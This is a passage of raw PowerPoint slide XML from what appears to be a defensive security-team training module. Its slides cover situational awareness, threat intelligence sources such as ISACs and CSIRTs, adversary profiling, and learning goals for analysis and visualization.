                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Industry ISACs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Assets dissimilar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630238" lvl="2" indent="-285750" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Much larger user base</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630238" lvl="2" indent="-285750" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Problematic “ownership” of IP addresses &amp; domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630238" lvl="2" indent="-285750" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Relatively important assets are critical </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>infrastructure and key industry sectors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Monitoring is challenging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630238" lvl="2" indent="-285750" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data-sharing partnership </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>with individual organizations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630238" lvl="2" indent="-285750" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Development of custom tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60419" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6171174-5B28-BC4F-AAD9-22FB18F0C9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18238" y="4479925"/>
            <a:ext cx="2433637" cy="16224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0420" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35B43AC7-94ED-2847-B993-E54ABB1A271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99275" y="1554163"/>
            <a:ext cx="1709738" cy="256698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slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DF53A82-148A-B247-9A5B-688AABD3AD13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="379413"/>
            <a:ext cx="8363272"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>External Situational Awareness a Greater Challenge</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62466" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CBA0A11-6534-CF47-AA01-9F747ED48E78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="8219256" cy="430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29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1pPr>
            <a:lvl2pPr marL="293688" indent="-2921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2pPr>
            <a:lvl3pPr marL="804863" indent="-460375">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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How to know your adversary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Lack of access to sources of risk compared to internal sources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Focus on tactics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630238" lvl="2" indent="-285750" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attack vectors (exploits, delivery methods, ...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630238" lvl="2" indent="-285750" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sophistication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630238" lvl="2" indent="-285750" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Targets (company-specific, sector-specific, not targeted)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630238" lvl="2" indent="-285750" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Goals (financial, political, ...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Compare with the past activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sources of intelligence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630238" lvl="2" indent="-285750" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Public or private reports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630238" lvl="2" indent="-285750" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Partner with national and governmental CSIRTs sharing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>programmes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="630238" lvl="2" indent="-285750" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Communities (FIRST, trust groups)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630238" lvl="2" indent="-285750" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Observations from your team</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6ACD9BF-5F8A-7942-A757-325C571DDB61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Agenda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9218" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2D90834-65BC-5A4E-A370-32584C2933CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1206500"/>
            <a:ext cx="7829550" cy="430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1pPr>
            <a:lvl2pPr marL="293688" indent="-2921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14000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>By the end of this module, you will be able to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Justify adequate resources for analysis leading to essential conclusions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Understand the role of correlation for the analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Proactively perform exploratory analyses to find suspicious activities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Develop situational awareness to improve decision-making </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use visualization tools to better understand information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Employ and automation where it makes the biggest impact</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
